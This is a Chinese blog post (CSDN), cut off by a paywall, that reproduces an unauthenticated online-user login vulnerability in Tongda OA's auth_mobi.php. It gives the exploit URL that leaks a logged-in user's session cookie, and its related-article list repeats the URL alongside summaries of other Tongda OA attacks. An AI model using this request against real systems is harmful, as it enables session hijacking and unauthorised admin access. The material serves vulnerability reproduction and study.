【漏洞复现-通达OA】通达OA auth_mobi.php在线用户登录漏洞

已于 2024-02-18 16:08:52 修改
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 开发语言 web安全
于 2023-08-03 23:03:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/132094090
版权
本文介绍了通达OA协同办公系统的一个在线用户登录漏洞,详细解析了漏洞简介、影响版本及复现过程。通过特定接口,攻击者可获取PHPSESSION并利用返回的cookie登录后台,影响版本包括通达OA2017和通达OA11.7。
摘要由CSDN通过智能技术生成

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。

二、影响版本

  • 通达OA2017-通达OA11.7

三、漏洞复现

exp:

http://ip/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

访问该链

了解本专栏 订阅专栏 解锁全文 超级会员免费看
xiaokp7
关注
专栏目录
订阅专栏
漏洞复现-通达OA通达OA share身份认证绕过漏洞
xiaokp7的博客
02-18 629
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA header身份认证绕过漏洞复现
fly夏天的博客
12-25 1125
文章复现通达OA在2013/2016/2017 三个大版本下的未授权访问漏洞,攻击者可以利用漏洞直接以管理员身份访问后台。文章给出了详细复现方法和利用脚本。
SQL注入-通达OA SQL注入漏洞【CVE-2023-4166】原理及检测思路分析
#7的博客
05-08 932
本文主要介绍漏洞CVE-2023-4166即通达OA SQL注入漏洞的原理、攻击手法及检测思路。
漏洞概念/漏洞漏洞-零开始白帽子详细教程
最新发布
2401_84915584的博客
07-29 290
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
bluemoon_0的博客
02-15 793
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
通达OA v11.7 auth_mobi.php 在线用户登录漏洞
qq_36334672的博客
01-31 566
继续尝试访问:http://ip/mobile/auth_mobi.php?此时抓http://127.0.0.1/general/index.php 的包,把cookoie塞进去即可。接下来burp抓包。fofa:app=“通达OA通达OA v11.7。
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2877
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
通达V11.7auth_mobi.php任意用户登录漏洞复现
qq_44828901的博客
06-19 945
傻瓜式复现通达V11.7auth_mobi.php任意用户登录
漏洞复现-——通达OA任意用户登陆漏洞
dust_hk的博客
04-25 5189
0x01 环境准备 XXXXXXX自己下个源码搭了个环境 影响范围: 通达OA 2017、<11.5版本 0x02 攻击 此漏洞复现需要三个步骤 (1)访问/general/login_code.php通过二维码获取codeid (2)访问/logincheck_code.php传递codeid并将uid设置为1(admin默认为1),获取session (3)利用获取到的sessio...
通达OA前台任意用户登录漏洞复现
玄道的网安博客
11-27 2129
漏洞概述 通达OA是一套国内常用的办公系统,在V11.X<V11.5和通达OA 2017版本中存在任意用户登录漏洞。攻击者在远程且未经授权的情况下,通过此漏洞可以以任意用户身份登录到系统(包括系统管理员)。 影响版本 通达OA2017、V11.X<V11.5 环境搭建 下载安装 通达OA2017 v10.13.18 crack.zip 链接:https://pan.baidu.com/s/1ARWA5uB-T5eVBjEev3dChQ 提取码:1234 一键默认安装
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
漏洞复现-通达OA通达OA get_contactlist.php 敏感信息泄漏漏洞
xiaokp7的博客
02-18 440
通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。
通达OA v11.7 在线任意用户登录漏洞
qq_44657899的博客
06-26 5740
漏洞描述 通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。 漏洞影响 通达OA V11.7 漏洞复现 首先访问http://xxx. xxx . xxx . xxx /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 ,如果页面时空白的,则说明管理员在线,即可以利用。 已经获取到了cookie,此时再访问http://xx.x
漏洞复现通达oa 前台sql注入
失心少年
11-19 554
它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
通达OA前台任意用户登录漏洞复现
ergou11的博客
04-23 651
通达OA前台任意用户登录漏洞复现
通达OA漏洞复现
weixin_44831109的博客
03-30 1773
1.靶场http://172.168.20.38/ 2.使用http://xx.xx.xx.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 即http://172.168.20.38/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 发现显示relogin证明网站前没有人在线,需要等待有人登录的时候在尝试 如果页面啥也没显示着则使用http://xx.xx.xx.xx/general
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值